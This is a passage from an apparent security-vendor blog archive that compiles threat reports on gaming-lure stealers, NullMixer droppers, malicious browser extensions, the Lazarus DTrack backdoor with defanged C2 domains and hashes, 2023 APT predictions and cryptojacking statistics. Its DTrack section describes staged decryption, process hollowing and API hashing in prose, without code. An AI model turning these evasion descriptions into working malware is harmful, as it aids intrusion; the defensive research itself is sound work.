  • The top five PC games used as bait in these attacks were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty.
  • The top five mobile games used as a lure to target gamers were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA.
  • Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers’ security. In the year to June 2022, we detected 3,154 unique files of this type, affecting 13,689 people.
  • Miners pose an increasing threat, with Far Cry, Roblox, Minecraft, Valorant and FIFA heading the list of games and game series that cybercriminals used as a lure for such threats.

Among the top threats is RedLine, which we deemed worthy of a separate report. The attackers distribute this password-stealing Trojan under the guise of game cheats in an attempt to steal accounts, card numbers, crypto-wallets and more. They post videos on YouTube purportedly about how to use cheats in popular online games such as Rust, FIFA 22, DayZ and others. The videos prompt the victim to follow a link in the description to download and run a self-extracting archive.

The Trojan, once installed, steals account passwords, credit card details, session cookies and more. RedLine is also able to execute commands on the computer, as well as download and install other programs onto the infected machine.

RedLine also comes with a cryptocurrency miner. Gaming computers are a logical target for cybercriminals, since they typically have powerful GPUs – useful for cryptocurrency mining.

In addition to losing sensitive data, the player’s reputation is at stake. RedLine downloads videos from the C2 server and posts them on the victim’s YouTube channel – the same video that led the gamer to become infected. In this way, they become the means by which other gamers become infected.

NullMixer: oodles of Trojans in a single dropper

Trying to save money by using unlicensed software can be costly: a single file downloaded from an unreliable source can result in system compromise. In September, we published our analysis of NullMixer, a Trojan dropper designed to drop a wide variety of malware families.

NullMixer spreads via malicious web sites that can be accessed using standard search engines. Often, the web sites host “cracks”, “keygens” and activators for downloading software illegally: they pretend to be legitimate, but actually contain a malware dropper. They stay at the top of search engine results using SEO.

When someone attempts to download software from one of these sites, they are redirected multiple times, ending up on a page containing download instructions and archived password-protected malware masquerading as the desired piece of software. When they extract and execute the file, the malware drops a number of malicious files to the compromised machine. The malware families dropped onto the computer include SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine (described above), Fabookie and ColdStealer, consisting of backdoors, spyware, bankers, credential stealers, droppers and more.

Once all the dropped files have been launched, the NullMixer starter beacons to the C2 to confirm the successful installation. The dropped files are then left to their own devices.

Since the beginning of the year, we have blocked attempts to infect more than 47,778 people worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the US.

Many of the malware families dropped by NullMixer are downloaders, which suggests that infections will not be limited to the malware families described in our report. Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.

Potential threat in the browser

Browser extensions are very useful for blocking ads, keeping a to-do list, spellchecking, translating text and much more. They are also popular: Chrome, Safari, Mozilla and other browsers have their own online stores distributing thousands of extensions – and the most popular plug-ins there reach over 10 million people. However, extensions are not always secure; and even seemingly innocent add-ons can present a real risk.

Malicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with malicious ones. Some impersonate popular legitimate extensions. Often, such add-ons are distributed through official marketplaces. In 2020, Google removed 106 browser extensions from its Chrome Web Store – all siphoned off sensitive user data, such as cookies and passwords, and even took screenshots. These extensions had been downloaded 32 million times.

It’s always good to check the permissions an extension requests during installation. And if it’s asking for permission to do things that don’t seem appropriate, don’t install it. For example, a browser calculator that asks for access to geolocation or browsing history. However, it’s not always so clear. Often the wording is so vague that it is impossible to tell exactly how secure an extension is. Basic extensions often require permission to “read and change all your data on the websites you visit”. They may really need it in order to function properly, but this permission gives the extension wide powers.

Even if not malicious, they can still be dangerous. Many collect massive amounts of data from web pages people visit. To earn more money, some developers may pass it on to third parties or sell it to advertisers. If that data is not anonymized properly, information about web sites that people visit and what they do there could be exposed to third parties.

Extension developers are also able to push updates without requiring any action by the person who installed it. Even a legitimate extension could be later hijacked to install malware.

We recently published an overview of the types of threat that mimic useful web-browser extensions and statistics on attacks, using data from the Kaspersky Security Network (KSN), for the period between January 2020 and June 2022.

In the first half of this year, 1,311,557 people tried to download malicious or unwanted extensions at least once, which is more than 70 percent affected by the same threat in the whole of last year.

From January 2020 to June 2022, adware hiding in browser extensions affected more than 4.3 million people, which is approximately 70 percent of all people affected by malicious and unwanted add-ons.

The most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect people to affiliate links.

DTrack activity targeting Europe and Latin America

15 Listopad, 2022 - 11:00

Introduction

DTrack is a backdoor used by the Lazarus group. Initially discovered in 2019, the backdoor remains in use three years later. It is used by the Lazarus group against a wide variety of targets. For example, we’ve seen it being used in financial environments where ATMs were breached, in attacks on a nuclear power plant and also in targeted ransomware attacks. Essentially, anywhere the Lazarus group believes they can achieve some financial gain.

DTrack allows criminals to upload, download, start or delete files on the victim host. Among those downloaded and executed files already spotted in the standard DTrack toolset there is a keylogger, a screenshot maker and a module for gathering victim system information. With a toolset like this, criminals can implement lateral movement into the victims’ infrastructure in order to, for example, retrieve compromising information.

As part of our crimeware reporting service, we published a new private report about recent Dtrack activity. In this public article we highlight some of the main findings shared in that report. For more information about our crimeware reporting service, please contact crimewareintel@kaspersky.com.

So, what’s new?

DTrack itself hasn’t changed much over the course of time. Nevertheless, there are some interesting modifications that we want to highlight in this blogpost. Dtrack hides itself inside an executable that looks like a legitimate program, and there are several stages of decryption before the malware payload starts.

First stage – implanted code

DTrack unpacks the malware in several stages. The second stage is stored inside the malware PE file. To get it, there are two approaches:

  • offset based;
  • resource based.

The idea is that DTrack retrieves the payload by reading it from an offset within the file or by reading it from a resource within the PE binary. An example of a decompiled pseudo function that retrieves the data using the offset-based approach can be found below.

Example of DTrack offset-oriented retrieval function

After retrieving the location of the next stage and its key, the malware then decrypts the buffer (with a modified RC4 algorithm) and passes control to it. To figure out the offset of the payload, its size and decryption keys, DTrack has a special binary (we have dubbed it ‘Decrypt config’) structure hidden in an inconspicuous part of the PE file.

Second stage – shellcode

The second stage payload consists of heavily obfuscated shellcode as can be seen below.

Heavily obfuscated second stage shellcode

The encryption method used by the second layer differs for each sample. So far, we have spotted modified versions of RC4, RC5 and RC6 algorithms. The values of the third stage payload and its decryption key are obtained by reading Decrypt config again.

One new aspect of the recent DTrack variants is that the third stage payload is not necessarily the final payload; there may be another piece of binary data consisting of a binary configuration and at least one shellcode, which in turn decrypts and executes the final payload.

Third stage – shellcode and final binary

The shellcode has some quite interesting obfuscation tricks to make analysis more difficult. When started, the beginning of the key (used to decrypt the final payload) is searched for. For example, when the beginning of the key is 0xDEADBEEF, the shellcode searches for the first occurrence of 0xDEADBEEF.

Chunk decryption routine example

Once the key is found, the shellcode uses it to decrypt the next eight bytes after the key, which form yet another configuration block with final payload size and its entry point offset. The configuration block is followed by an encrypted PE payload that starts at the entry point offset after decryption with the custom algorithm.

Final payload

Once the final payload (a DLL) is decrypted, it is loaded using process hollowing into explorer.exe. In previous DTrack samples the libraries to be loaded were obfuscated strings. In more recent versions they use API hashing to load the proper libraries and functions. Another small change is that three C2 servers are used instead of six. The rest of the payload’s functionality remains the same.

Infrastructure

When we look at the domain names used for C2 servers, a pattern can be seen in some cases. For example, the actors combine a color with the name of an animal (e.g., pinkgoat, purplebear, salmonrabbit). Some of the peculiar names used in the DTrack infrastructure can be found below:

Domain IP First seen ASN pinkgoat.com 64.190.63.111 2022‑03‑03 15:34 AS47846 purewatertokyo.com 58.158.177.102 2022‑05‑20 16:07 AS17506 purplebear.com 52.128.23.153 2021‑01‑08 08:37 AS19324 salmonrabbit.com 58.158.177.102 2022‑05‑20 09:37 AS17506 Victims

According to KSN telemetry, we have detected DTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey and the United States, indicating that DTrack is spreading into more parts of the world. The targeted sectors are education, chemical manufacturing, governmental research centers and policy institutes, IT service providers, utility providers and telecommunications.

Conclusions

The DTrack backdoor continues to be used actively by the Lazarus group. Modifications in the way the malware is packed show that Lazarus still sees DTrack as an important asset. Despite this, Lazarus has not changed the backdoor much since 2019, when it was initially discovered. When the victimology is analyzed, it becomes clear that operations have expanded to Europe and Latin America, a trend we’re seeing more and more often.

IOCs

C2 domains
pinkgoat[.]com
purewatertokyo[.]com
purplebear[.]com
salmonrabbit[.]com

MD5
1A74C8D8B74CA2411C1D3D22373A6769
67F4DAD1A94ED8A47283C2C0C05A7594

Advanced threat predictions for 2023

14 Listopad, 2022 - 09:00

It is fair to say that since last year’s predictions, the world has dramatically changed. While the geopolitical landscape has durably shifted, cyberattacks remain a constant threat and show no signs of receding – quite the contrary. No matter where they are, people around the world should be prepared for cybersecurity incidents. A useful exercise in that regard is to try to foresee the future trends and significant events that might be coming in the near future.

We polled our experts from the GReAT team and have gathered a small number of key insights about what APT actors are likely to focus on in 2023. But first, let’s examine how they fared with the predictions for 2022.

What we predicted in 2022 Mobile devices exposed to wide attacks

Although 2022 did not feature any mobile intrusion story on the scale of the Pegasus scandal, a number of 0-days have still been exploited in the wild by threat actors. Last June, Google’s TAG team released a blog post documenting attacks on Italian and Kazakh users that they attribute to RCS Lab, an Italian offensive software vendor. In another publication, Google also followed up on the activities of a similar vendor named Cytrox that had leveraged four 0-day vulnerabilities in a 2021 campaign.

The cyber-offense ecosystem still appears to be shaken by the sudden demise of NSO Group; at the same time, these activities indicate to us that we’ve only seen the tip of the iceberg when it comes to commercial-grade mobile surveillance tooling. It’s also likely that the remaining actors will make every effort to reduce their public exposure from now on, limiting our visibility into their activities.

From a different angle, reporting from The Intercept revealed mobile surveillance capabilities available to Iran for the purposes of domestic investigations that leverage direct access to (and cooperation of) local telecommunication companies. Looking back at past leaks of private companies providing such services, such as in the case of Hacking Team, we learned that many states all over the world were buying these capabilities, whether to complement their in-house technologies or as a stand-alone solution they couldn’t develop. This reveals a likely blind spot for defenders and endpoint vendors: in a number of cases, perhaps even the majority, attackers have no need for 0-days and malware deployment to gain access to the information they need. This story also raises questions about whether attackers who have breached telecommunication companies would also be able to leverage these legal interception systems.

Verdict: some incidents, but no major event ❌

Private sector supporting an influx of new APT players

The previous discussion covered a number of private companies that have filled the void left by NSO and have made a business of providing offensive software to their customers. In 2022, the GReAT team tracked several threat actors leveraging SilentBreak’s toolset as well as a commercial Android spyware we named MagicKarakurt. One question mark here is that it’s difficult to tell whether we’re seeing new APT actors being bootstrapped by commercial toolsets, or established ones updating their TTPs.

BruteRatel, an attack tool comparable to CobaltStrike, remains on our radar when it comes to APT adoption. A recent leak has put it in the hands of cybercrime actors and it is very likely that by the end of the year we will see it involved in APT cases too.

A worrying trend we did not explicitly mention is underlined by a Meta report published shortly after last year’s predictions. In the report, they describe the emergence of a “surveillance-for-hire” sector composed of companies all around the world that provide cyber-offensive services for (hopefully) law-enforcement customers. In practice, Facebook found that not only criminals or terrorists were targeted by such groups, but journalists, dissidents and human rights activists as well. Our own research confirms that mercenary threat actors such as DeathStalker were very active in 2022.


Source: Meta

Verdict: prediction fulfilled ✅

More supply chain attacks

Following the SolarWinds incident, we foresaw that attackers would notice the enormous potential of the supply chain attack vector. In 2022, we spotted malicious Python packages distributed through the PyPI archive (CheckPoint also detected 10 of them). As Cisco Talos notes, Python is not alone in this: NPM, NuGet or RubyGems are all potential candidates for such attacks and all it would take for a catastrophic event would be the compromise of a single developer’s credentials. Doubling down on developer-specific threats, IBM presented noteworthy research at this year’s edition of BlackHat, evidencing how source code management or continuous integration systems could be leveraged by attackers.

Another aspect of supply chain security is the reliance on open-source software components that may contain vulnerabilities: this was the root cause of a Zimbra 0day massively exploited in the wild this year.

When it comes to stealthy malware pushed to customers in the form of a software update however, we are not aware of any significant event in 2022, so we’ll only count this prediction as partially accomplished.

Verdict: prediction partially fulfilled 🆗 (more cases, no major event)

Continued exploitation of remote work

The reasoning behind this prediction is that we expected that in 2022, companies would still be lagging behind the transformative effects the COVID-19 crisis had on work organization. In many cases, this led to a rushed deployment of remote access means for employees, in the form of appliances that could be misconfigured, or hadn’t received much security attention until now.

A massive number of vulnerabilities were patched in such devices this year (firewalls, routers, VPN software…) – whether or not each of these vulnerabilities were exploited in the wild before being discovered, they affect devices that are not typically updated in a timely fashion and become prime targets for hackers immediately after vulnerability details are published. Such discoveries usually lead to massive and indiscriminate exploitation, and compromised machines are sold on dark markets to secondary buyers for the purposes of ransomware deployment.

Our own telemetry also confirms that RDP brute-force attacks have remained predominant throughout 2022.

Verdict: prediction fulfilled ✅

Increase in APT intrusions in the META region, especially Africa

At the end of last year, we expected the rise of Africa to be one of the major geopolitical events of the year in lieu of the ever-increasing investment and relationships with China and the Middle East.

We have indeed seen an increase in the number of persistent, sophisticated attacks targeting various states in META and specifically Africa. Starting from the most recent publication about Metador targeting telecommunication companies, HotCousin expanding its operations to this region, the numerous campaigns deploying various IIS backdoors, DeathStalker and Lazarus attacking multiple industries there and a mysterious SSP-library backdoor discovered on governmental and non-profit entities, we saw quite a few new threats active in the region over the last year.

Statistically speaking, we released information about an increase of backdoor infections on the continent. While such raw statistics are difficult to interpret and are not necessarily linked to strong APT activity, it could correlate to the increase in APT attacks we’ve seen in the region in 2022.

One glaring example is Iran, which faced a series of spectacular hacks and sabotages. Its atomic energy agency, live television and steel industry have been targeted, among others.

Verdict: prediction fulfilled ✅

Explosion of attacks against cloud security and outsourced services

One of the major cyber-incidents of 2022 took place early this year: the Okta hack. Okta was breached through one of its service providers, Sitel, itself compromised via the insecure VPN gateway of a recently acquired company. Fortunately for them, the hacker appears to have been a lone 16-year-old. Unfortunately for us, it demonstrates how easy it must be for sophisticated attackers to penetrate (and, in all likelihood, remain undetected) major platforms. Okta is a widely used authentication services provider, and it is safe to assume that a hacker controlling their network would be able to infect any of their customers.

In related news, CISA released an advisory in May warning managed service providers that they saw an increase of malicious activity targeting their sector. Beyond this, we also saw reports of important data leaks related to misconfigured AWS S3 buckets, although those are nothing new. Overall, we count this prediction as having turned out to be accurate.

Verdict: prediction fulfilled ✅

The return of low-level attacks: bootkits are ‘hot’ again

In line with our predictions, we released two blog posts in 2022 introducing sophisticated low-level bootkits. The first one, in January, was MoonBounce; the other was CosmicStrand in July 2022. In both cases, we described new UEFI firmware bootkits that managed to propagate malicious components from the deepest layers of the machine up to Windows’ user-land. Amn Pardaz also released a report about a malicious program called iLOBleed, which affects a management module present on HP servers and should be counted in the same category. Such highly sophisticated implants remain rare, and witnessing three separate cases in a single year is significant.

Worthy of mention is Binarly’s excellent work on firmware vulnerability research with 22 high-severity vulnerabilities discovered in low-level components for 2022, indicating an enormous attack surface remains. As Gartner once put it: “There are two types of companies – those who have experienced a firmware attack, and those who have experienced a firmware attack but don’t know it.”

Verdict: prediction fulfilled ✅

States clarify their acceptable cyber-offense practices

The rise of hacker indictments as part of states’ retorsion measures led us to believe that each of them would be forced to clarify their vision of what acceptable behavior in cyberspace is. Indeed, since most states admit to having their own cyber-offense program, there is a need to clarify why their own activities are tolerable while those of their adversaries deserve legal action. We therefore expected various parties to release a sort of taxonomy indicating which types of ends would justify the means.

Shortly after the release of our predictions (yet still in 2021), the UK released its Integrated Review of Security, Defence, Development and Foreign Policy in which it describes its vision of what a “responsible democratic cyber power” should be. No other country followed suit. With many key “cyber powers” engaged one way or another in the Ukrainian conflict, cyber-diplomacy has unfortunately taken a back seat and we are seeing less transparency (as well as less calls for transparency) in the cyber realm. In the end, our assessment that the world was moving towards a clarification of cyber-policies didn’t come to pass.

Verdict: very limited fulfillment of the prediction ❌

APT predictions for 2023

And now, we turn our attention to the future. Here are the developments we think we could be seeing in 2023.

The rise of destructive attacks

2022 bore witness to brutal geopolitical shifts that will echo for years to come. History shows that such tensions always translate to increased cyber-activities – sometimes for the purpose of intelligence gathering, sometimes as a means of diplomatic signaling. With the antagonism between the West and the East having reached the maximum possible level short of open conflict, we unfortunately expect 2023 will feature cyberattacks of unprecedented gravity.

Specifically, we foresee that a record number of disruptive and destructive cyberattacks will be observed next year, affecting both the government sector and key industries. One caveat is that in all likelihood, a proportion of them will not be easily traceable to cyber-incidents and will look like random accidents. The rest will take the form of pseudo-ransomware attacks or hacktivist operations in order to provide plausible deniability for their real authors.

In addition, we also fear that a limited number of high-profile cyberattacks against civilian infrastructure (energy grid or public broadcasting for instance) will take place. A last point of concern is the safety of underwater cables and fiber distribution hubs in such a context, as they are particularly difficult to protect from physical destruction.

Mail servers become priority targets

In the past years, we have seen vulnerability researchers increasingly focus on emailing software. The reason is simple: they represent huge software stacks that must support many protocols and have to be internet-facing to operate properly. The market leaders, Microsoft Exchange and Zimbra have both faced critical vulnerabilities (pre-authentication RCEs) that were exploited, sometimes massively, by attackers before a patch was available.

We believe that research into mail software vulnerabilities is only getting started. Mail servers have the double misfortune of harboring key intelligence of interest to APT actors and having the biggest attack surface imaginable. 2023 will very likely be a year of 0-days for all major email software. We encourage system administrators to immediately set up monitoring for these machines, due to the unlikelihood that patching (even in a timely fashion) will be sufficient to protect them.

The next WannaCry

Statistically, some of the largest and the most impactful cyber epidemics occur every 6-7 years. The last incident of the sort was the infamous WannaCry ransomware-worm, leveraging the extremely potent EternalBlue vulnerability to automatically spread to vulnerable machines.

Fortunately, vulnerabilities that enable the creation of worms are rare and far-between, and need to meet a number of conditions to be suitable (reliability of the exploit, stability of the target machine, etc.). It is extremely difficult to predict when such a bug will be discovered next, but we will take a wild guess and mark it up for next year. One potential reason increasing the likelihood of such an event is the fact that the most sophisticated actors in the world likely possess at least one suitable exploit of the sort, and current tensions greatly increase the chance that a ShadowBrokers-style hack-and-leak (see below) could take place.

APT targeting turns toward satellite technologies, producers and operators

It is nearly 40 years since the US’s Strategic Defense Initiative (nicknamed “Star Wars”) contemplated extending military capabilities to include space technologies. While such things may have seemed a little far-fetched in 1983, there have been several instances where countries have successfully interfered with satellites orbiting the earth.

Both China and Russia have used ground-based missiles to destroy their own satellites. There have also been claims that China has launched a satellite with a grappling arm that could be used to interfere with orbiting equipment and that Russia may have developed the same technology. We have already seen the hijacking of satellite communications by an APT threat actor.

If the Viasat incident is any indication, it is likely that APT threat actors will increasingly turn their attention to the manipulation of, and interference with, satellite technologies in the future, making the security of such technologies ever more important.

Hack-and-leak is the new black (and bleak)

There is still much debate regarding whether “cyberwar” indeed took place in the context of the Ukrainian crisis. It is however clear that a new form of hybrid conflict is currently unfolding, involving (among many things) hack-and-leak operations.

This modus operandi involves breaching a target and releasing internal documents and emails publicly. Ransomware groups have resorted to this tactic as a way to apply pressure on victims, but APTs may leverage it for purely disruptive ends. In the past, we’ve seen APT actors leak data about competing threat groups, or create websites disseminating personal information. While it is difficult to assess their effectiveness from the sidelines, there’s no doubt they’re part of the landscape now and that 2023 will involve a high number of cases.

More APT groups will move from CobaltStrike to other alternatives

CobaltStrike, released in 2012, is a threat emulation tool designed to help red teams understand the methods an attacker can use to penetrate a network. Unfortunately, along with the Metasploit Framework, it has since become a tool of choice for cybercriminal groups and APT threat actors alike. However, we believe that a number of threat actors will begin to use other alternatives.

One of these alternatives is Brute Ratel C4, a commercial attack simulation tool that is especially dangerous since it has been designed to avoid detection by antivirus and EDR protection. Another is the open-source offensive tool Sliver.

In addition to off-the-shelf products abused by threat actors, there are other tools that are likely to be included in APT toolsets. One of these, Manjusaka, is advertised as an imitation of the Cobalt Strike framework. The implants of this tool are written in the Rust language for Windows and Linux. A fully functional version of the C&C written in Golang is freely available and can easily generate new implants with custom configurations. Another is Ninja, a tool that provides a large set of commands, which allows attackers to control remote systems, avoid detection and penetrate deep inside a target network.

Overall, we suspect that CobaltStrike is receiving too much attention from defenders (especially when it comes to the infrastructure), and that APTs will make attempts to diversify their toolsets in order to remain undetected.

SIGINT-delivered malware

It has been almost 10 years since the Snowden revelations shed light on the FoxAcid/Quantum hacking system used by the NSA. They involve leveraging “partnerships with US telecoms companies” to place servers in key positions of the internet backbone, allowing them to perform man-on-the-side attacks. This is one of the most potent attack vectors imaginable, as they allow victims to be infected without any interaction. In 2022, we saw another threat actor replicate this technique in China, and there is little doubt in our minds that many groups have worked tirelessly to acquire this capability. While deploying it at scale requires political and technological power available to few, it is likely that by now, Quantum-like tools would be implemented on the local level (i.e., at country level, by relying on national ISPs).

Such attacks are extremely hard to spot, but we predict that their becoming more widespread will lead to more discoveries in 2023.

Drone hacking!

Despite the flashy title, we’re not talking about hacks of unmanned aircrafts used for surveillance or even military support (although that could happen too). This final prediction concerns itself with the other way around: the use of commercial-grade drones to enable proximity hacking.

Year after year, drones available to the general public gain additional range and capabilities. It wouldn’t take too much work to mount one of them with a rogue Wi-Fi access point or an IMSI catcher; or sufficient tooling that would allow the collection of WPA handshakes used for offline cracking of Wi-Fi passwords. Another attack scenario would be using drones to drop malicious USB keys in restricted areas, in the hope that a passer-by would pick them up and plug them into a machine. All in all, we believe this to be a promising attack vector, likely to be used by bold attackers or specialists already adept at mixing physical- and cyber-intrusion.

See you next year to see how we fared!

The state of cryptojacking in the first three quarters of 2022

10 Listopad, 2022 - 09:00

Cryptocurrency prices were dropping from the end of 2021 and throughout the first half of 2022. Although finance experts and retail investors estimate crypto to have a solid chance of recovery in the long term, at the time of writing this report the prices remain low. However, cybercriminals are capitalizing on this vulnerable industry more than ever. From advanced APT campaigns targeting crypto organizations (BlueNoroff, NaiveCopy, etc) to various types of hastily made crypto scams, we observe threat actors diversifying their malicious activity against crypto investors — and not only them.

In fact, cybercriminals hunting for crypto can target anyone. Apart from cryptocurrency theft they extort digital money or illicitly mine it using victim’s devices instead of their own. Cryptocurrency mining is a painstaking and costly process, and not as rewarding as when the prices were high. However, it still attracts even legitimate miners. This can be explained, on the one hand, by the falling cost of mining equipment and, on the other, by less efficient market players having left the game, allowing those who remain to increase their market share. Cybercriminals pay neither for equipment, nor for electricity, which is rather expensive in 2022. They install mining software on the target computer to use its processing power without the victim’s consent. Moreover, malicious mining, or cryptojacking, does not require a lot of narrow technical expertise. In fact, all the attacker needs to know is how to create a miner using open-source code, or where to buy one. If the cryptomining malware is installed successfully on the victim’s computer, it delivers its operator stable earnings. In this report we analyze cryptojacking activity in the first three quarters of 2022, and provide some relevant statistics and insights.

Methodology

This research aims to define the state of cryptojacking in the current threat landscape. The data in this report has been taken from aggregated threat statistics obtained from a variety of sources that include our internal sources, open sources, etc. The main tool we use to obtain and analyze threat-related data is Kaspersky Security Network (KSN). KSN is dedicated to processing cybersecurity-related depersonalized data streams from Kaspersky products whose users consented to anonymized data collection. The metrics provided in this report are based on the number of distinct users of Kaspersky products with KSN enabled who encountered cryptominers at least once in a given period, as well as research into the threat landscape by Kaspersky experts. All analyzed data is anonymized.

In this report, we examine the main motivation factors for cybercriminals resorting to malicious mining, as well as the most widespread ways of propagation into the victim’s computer. The threat landscape of hidden mining malware is analyzed through a close examination of new malware modifications, the number of affected users, and their geographical distribution. Additionally, we look into certain cryptojackers’ wallets to get some insight into the amount of money they receive.

The statistics in this report are provided for the first three quarters of 2022. The data from 2022 is compared to data from 2021 to assess year-on-year development trends in cryptojacking.

Key findings:
  • Malicious mining programs are widely distributed through unpatched vulnerabilities in operating systems. In Q3 2022, nearly one in six cases of exploiting well-known vulnerabilities was accompanied with miner infection.
  • In Q3 2022, the number of new variants of miners saw more than triple growth when compared to Q3 2021, and exceeded 150,000.
  • Q1 2022 saw the biggest number of users (over 500,000) affected by malicious mining software, and the smallest number of new malicious miner variants.
  • The country with the highest number of attacked users was Ethiopia, where cryptocurrencies are banned officially.
  • Monero (XMR) is the most popular cryptocurrency for malicious mining.
To mine or not to mine?

Cryptojacking is becoming more prominent in the global threat landscape. This year we saw various types of attackers switching their attention to crypto mining. For example, AstraLocker, a major ransomware operator, shut down this activity to pursue cryptojacking. One of the main reasons for that shift may lie in the fact that malicious mining is one of the easiest ways to earn passive income. While ransomware operators pursue bigger money, not every attack results in the ransom being paid. Miners, on the contrary, just infect the machine and earn a stable profit for their operators. Moreover, unlike ransomware, which announces its presence as soon as the victim files are encrypted, mining malware can remain in the target system unnoticed for months or even longer.

Ways of propagation

There are many ways to distribute miners, and most of them are similar to the methods of distribution of any other type of malware.

One of the most popular miner distribution methods is through malicious files masquerading as pirated content. Cybercriminals actively lure their victims with trendy films, music, games, and software to spread malicious mining programs. They can distribute them through specially crafted landing pages, as well as via torrent links.

While the method described above affects mostly consumer devices, there are a number of distribution methods for delivering miners to more powerful equipment used by businesses. They include hacking the victim’s server using leaked or bruteforced credentials, worm-like spreading through flash drives or network storages, and distributing miners through unpatched vulnerabilities in the OS and other software.

Not always malware

Interestingly, cybercriminals use not only malware to mine digital currency without users’ consent. They try to avoid detection and save resources on malware development using legitimate mining programs with open-source code. By themselves, these tools do not contain malicious functionality, but they can be loaded by mining malware and used for cryptojacking.

Example of legitimate programs used by cryptojackers to covertly mine Ethereum (ETH), Ravencoin (RVN), Ethereum Classic (ETC), and Ergo (ERG), according to our statistics

Cryptojacking in numbers Vulnerability exploitation and miners

Unpatched vulnerabilities pose a serious challenge to users, while being an appealing lure for cybercriminals who exploit them to spread malicious activity. Our telemetry shows that miners are one of the most widespread types of threats when it comes to attacks via vulnerable software. Moreover, 2022 saw an increase in the share of hidden mining software distributed through well-known vulnerabilities. This year, nearly one in seven attacks exploiting such vulnerabilities was accompanied with miner infection. In Q3, miners became even more widespread than backdoors, which were the prime choice of cybercriminals throughout the first half of 2022, and accounted for one sixth of all vulnerability exploitation attacks.

TOP 4 malware types that attackers tried to launch as a result of exploiting vulnerabilities, Q1–Q3 2022 (download)

Let’s look at some specific services whose vulnerabilities are often used in cyberattacks. In Q1 2022, 14% of SQLAgent vulnerability exploitation cases resulted in miner infection, and in Q3 2022 this number grew slightly to 16% of all SQLAgent attacks.

TOP 4 malicious and unwanted file types installed via SQLAgent vulnerabilities, Q1–Q3 2022 (download)

The share of mining software loaded as a result of exploitation of LSASS-related vulnerabilities grew as well, from 17% in Q1 2022 to 19% in Q3.

TOP 4 malicious and unwanted file types installed as a result of exploitation of LSASS-related vulnerabilities, Q1–Q3 2022 (download)

New modifications and affected users

The overall number of new modifications of malicious mining software also increased dramatically in 2022. From January to the end of October 2022, Kaspersky solutions detected 215,843 new modifications of miners. This is more than twice the rate for the same period in 2021, when the number of modifications edged slightly over 100,000.

Notably, the number of new variants of such programs skyrocketed in Q3 2022. Compared to Q3 2021, that was more than threefold growth. Thus, in Q3 2022, the number of new malicious miners exceeded 150,000. This may be explained by the fact that after hitting their lowest rates in late June and the beginning of July, cryptocurrencies grew slightly at the end of the month. Cybercriminals may have increased their activity in anticipation of further growth that did not happen.

Number of new miner modifications, Q1–Q3, 2021 and 2022 (download)

Interestingly, during the period of analysis, the biggest number of affected users was registered not in Q3, which experienced a surge in new miner modifications, but in Q1, when the number of new modifications was the lowest.

Number of users affected by miners, Q1–Q3, 2021 and 2022 (download)

Attack geography

Interestingly, the most targeted country in Q3 2022 was Ethiopia (2.38%), where it is illegal to use and mine cryptocurrencies. Kazakhstan (2.13%) and Uzbekistan (2.01%) follow in second and third place.

TOP 10 most targeted countries by share of users encountering miners, Q3 2022:

Country* % of users attacked by miners** 1 Ethiopia 2.38% 2 Kazakhstan 2.13% 3 Uzbekistan 2.01% 4 Rwanda 1.93% 5 Tajikistan 1.83% 6 Venezuela 1.78% 7 Kyrgyzstan 1.73% 8 Mozambique 1.57% 9 Tanzania 1.56% 10 Ukraine 1.54%

* Excluded are countries where the number of Kaspersky users is relatively small (less than 50,000)
** Percentage of unique users whose devices were attacked by miners, from all unique users of Kaspersky products in the country.

Fourth place goes to Rwanda (1.93%), and fifth to Tajikistan (1.83%). The sixth most attacked country is Venezuela (1.78%), which is known to be among the first nations in the world to introduce a national cryptocurrency, Petro.

Let’s talk money

We took a closer look into the mining attacks to get some understanding of which coins are more popular among cybercriminals, and how much money they make mining these coins. For this we analyzed mining malware samples that were detected by our products in September 2022, extracted cryptocurrency wallet addresses from them, and monitored transactions to these wallets from January 1, 2022, through September 30, 2022. Note that there are other miner samples, as well as other wallets out there that are not represented in these statistics. Note also that we cannot distinguish mining transactions to the monitored wallets from other types of transactions.

Most of the analyzed samples of malicious mining software (48%) secretly mine Monero (XMR) currency via the victim’s engine. This currency is known for its advanced technologies that anonymize transaction data to achieve maximum privacy. Observers cannot decipher addresses trading Monero, transaction amounts, address balances, or transaction histories — all these factors are extremely appealing to cybercriminals.

Most popular digital cryptocurrencies mined via cryptojacking (download)

The world’s most popular cryptocurrency, Bitcoin (BTC), was cybercriminals’ second choice with a share of 17%; while Ethereum (ETH), which is most frequently used to exchange NFTs, closes the Top 3 with 14%. Other cryptocurrencies mined by cybercriminals are Litecoin (LTC), Bit Hotel (BTH), Dash (DASH), Dogecoin (DOGE), and Neo (NEO).

Cybercriminal profits vary greatly from wallet to wallet. Bitcoin wallets we monitored on average received 0.08 BTC or around US$1.6K per month. However, one Bitcoin wallet showed significantly greater transaction amounts. In September 2022, for example, it received nearly 1.79 BTC, the equivalent of more than US$34K at the time of research.

Conclusion

Even though the world is facing a crypto winter with digital currencies losing their value, cryptocurrencies remain appealing for cybercriminals. The rise in the number of cryptojacking attacks goes hand in hand with the rising number of new program modifications and diversified ways of propagation. Hidden mining is a profitable activity which requires minimum effort; therefore, cybercriminals will continue to try to gain profit this way. Although hidden mining doesn’t cause direct financial damage to victims, it lowers the performance of infected systems, at the same time as increasing the electricity costs for victims. Therefore, companies and users should remain alert to the current threat trends and get ready for the crypto spring ahead of us.

To ensure no one is using your home equipment for their own profit, follow these tips:

  • Use reliable security solutions that protect your computer and other devices from mining malware.
  • Download software and media from official sources; remember that pirate files can contain a malicious payload.
  • Do not forget to update your operating system and other software.

To keep your corporate devices protected, we recommend:

  • Always keeping software updated on all devices you use so as to prevent attackers from infiltrating your network by exploiting vulnerabilities.
  • Introducing strict cybersecurity policies in your organization to avoid a situation when employees use corporate computing power to mine crypto coins or install malicious software on corporate equipment by accident.
  • Using a dedicated security solution such as Kaspersky Endpoint Security for Business that can quickly detect and eliminate malicious activity, as well as help manage vulnerabilities and patches.

Cybersecurity threats: what awaits us in 2023?

9 Listopad, 2022 - 09:00

